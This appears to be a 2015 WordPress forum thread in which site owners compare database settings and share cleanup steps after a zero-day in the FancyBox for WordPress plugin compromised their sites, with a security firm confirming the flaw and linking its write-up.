Possible malware

Forgive me for my ignorance, I did the search SQL query from one of other sites that didn’t have Fancy Box installed. I just did the search SQL query from the infected site and here is what I got:

a:2:{s:10:”extraCalls”;s:1:” “;s:16:”extraCallsEnable”;s:2:”on”;}

Sorry about that.

Anyone have a backup of the db from yesterday? Can they check the same key whether it’s not empty?

snip

I have another website that is using fancy box and the site is working properly.

Hey guys,

Anyone affected would be willing to share logs? If you can email them to [email protected], we are trying to get a better picture of what is happening.

thanks,

It’s definitely a vulnerability in fancybox. Disable at once.

DB Backup from 28.01.2015:
a:2:{s:10:"extraCalls";s:1:" ";s:16:"extraCallsEnable";s:2:"on";}

DB Backup from 14.12.2014:

a:38:{s:11:"borderColor";s:7:"#BBBBBB";s:15:"showCloseButton";s:2:"on";s:11:"closeHorPos";s:5:"right";s:11:"closeVerPos";s:3:"top";s:12:"paddingColor";s:7:"#FFFFFF";s:7:"padding";s:2:"10";s:11:"overlayShow";s:2:"on";s:12:"overlayColor";s:7:"#666666";s:14:"overlayOpacity";s:3:"0.3";s:9:"titleShow";s:2:"on";s:13:"titlePosition";s:6:"inside";s:10:"titleColor";s:7:"#333333";s:13:"showNavArrows";s:2:"on";s:11:"zoomOpacity";s:2:"on";s:11:"zoomSpeedIn";s:3:"500";s:12:"zoomSpeedOut";s:3:"500";s:15:"zoomSpeedChange";s:3:"300";s:12:"transitionIn";s:4:"fade";s:13:"transitionOut";s:4:"fade";s:8:"easingIn";s:11:"easeOutBack";s:9:"easingOut";s:10:"easeInBack";s:12:"easingChange";s:14:"easeInOutQuart";s:10:"imageScale";s:2:"on";s:14:"centerOnScroll";s:2:"on";s:18:"hideOnOverlayClick";s:2:"on";s:18:"enableEscapeButton";s:2:"on";s:11:"galleryType";s:3:"all";s:16:"customExpression";s:74:"jQuery(thumbnails).addClass("fancybox").attr("rel","fancybox").getTitle();";s:14:"autoDimensions";s:2:"on";s:10:"frameWidth";s:3:"560";s:11:"frameHeight";s:3:"340";s:15:"callbackOnStart";s:0:"";s:16:"callbackOnCancel";s:32:"function() { alert("Cancel!"); }";s:18:"callbackOnComplete";s:0:"";s:17:"callbackOnCleanup";s:33:"function() { alert("CleanUp!"); }";s:15:"callbackOnClose";s:0:"";s:16:"extraCallsEnable";s:2:"on";s:10:"extraCalls";s:171:"var arr = jQuery("a.fancybox");
jQuery.each(arr, function() {
 var title = jQuery(this).children("img").attr("alt");
 beforeLoad: jQuery(this).attr('title',title);
});";}

Not sure if that helps, though. Just looks like some cleaned up options.

I disabled and cleared my database and resubmitted my site to google. Hopefully this fixes the issue

@gennady thanks for your help.

We can confirm it is a vulnerability (0-day) in the plugin. We actually have the malware (exploit) payloads being used to compromise sites.

We will post more details in a bit.

Thanks Daniel for the info. I just caught this post from the Sucuri.net site:

https://www.malwareremovalservice.com/fancybox-for-wordpress-iframe-injection

Oh, that’s not us. Just someone trying to copy (or look like) us ??

Our blog post is here:

https://blog.sucuri.net/2015/02/zero-day-in-the-fancybox-for-wordpress-plugin.html

thanks!

Crap, sorry about that link, should of paid more attention.

It is the same on my website!
Some days ago I found my Fancybox settings all restored, and I found that weird!
Today my website has been blocked and I thought it could be something related to that plugin, and now I found the confirmation and removed it.
Thank you.

Has Google ‘okayed’ anyones site yet?

(after removing the plugin, and submitting to Google)

Mine was just approved and website is working